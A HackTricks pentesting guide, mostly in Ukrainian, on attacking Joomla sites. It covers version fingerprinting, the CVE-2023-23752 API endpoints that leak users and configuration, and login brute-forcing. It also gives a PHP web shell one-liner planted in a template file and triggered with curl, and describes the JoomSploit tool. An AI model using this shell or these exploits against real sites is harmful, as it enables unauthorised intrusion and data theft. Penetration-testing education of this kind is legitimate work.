Joomla
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Deepen your expertise in Mobile Security with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
Joomla збирає деякі анонімні статистичні дані, такі як розподіл версій Joomla, PHP та бази даних, а також операційних систем серверів, що використовуються в установках Joomla. Ці дані можна запитувати через їхній публічний API.
Перевірте meta
robots.txt
README.txt
У /administrator/manifests/files/joomla.xml ви можете побачити версію.
У /language/en-GB/en-GB.xml ви можете отримати версію Joomla.
У plugins/system/cache/cache.xml ви можете побачити приблизну версію.
In 80,443 - Pentesting Web Methodology є розділом про CMS сканери, які можуть сканувати Joomla.
Версії від 4.0.0 до 4.2.7 вразливі до неавтентифікованого розкриття інформації (CVE-2023-23752), яке виведе облікові дані та іншу інформацію.
Користувачі: http://<host>/api/v1/users?public=true
Конфігураційний файл: http://<host>/api/index.php/v1/config/application?public=true
MSF Модуль: scanner/http/joomla_api_improper_access_checks
або ruby скрипт: 51334
Ви можете використовувати цей скрипт для спроби брутфорсити вхід.
Якщо вам вдалося отримати адміністративні облікові дані, ви можете RCE всередині нього, додавши фрагмент PHP коду для отримання RCE. Ми можемо зробити це, налаштувавши шаблон.
Натисніть на Templates
внизу зліва під Configuration
, щоб відкрити меню шаблонів.
Натисніть на назву шаблону. Виберемо protostar
під заголовком стовпця Template
. Це перенесе нас на сторінку Templates: Customise
.
Нарешті, ви можете натиснути на сторінку, щоб відкрити джерело сторінки. Виберемо сторінку error.php
. Додамо PHP однорядник для отримання виконання коду наступним чином:
system($_GET['cmd']);
Зберегти та закрити
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Скрипт експлуатації Joomla, який підвищує XSS до RCE або інших критичних вразливостей. Для отримання додаткової інформації перегляньте цей пост. Він забезпечує підтримку версій Joomla 5.X.X, 4.X.X та 3.X.X, і дозволяє:
Підвищення привілеїв: Створює користувача в Joomla.
(RCE) Вбудоване редагування шаблонів: Редагує вбудовані шаблони в Joomla.
(Користувацькі) Користувацькі експлойти: Користувацькі експлойти для сторонніх плагінів Joomla.
Поглибте свої знання в Мобільній безпеці з 8kSec Academy. Опануйте безпеку iOS та Android через наші курси з самостійним навчанням та отримайте сертифікат:
Вивчайте та практикуйте Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Вивчайте та практикуйте Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)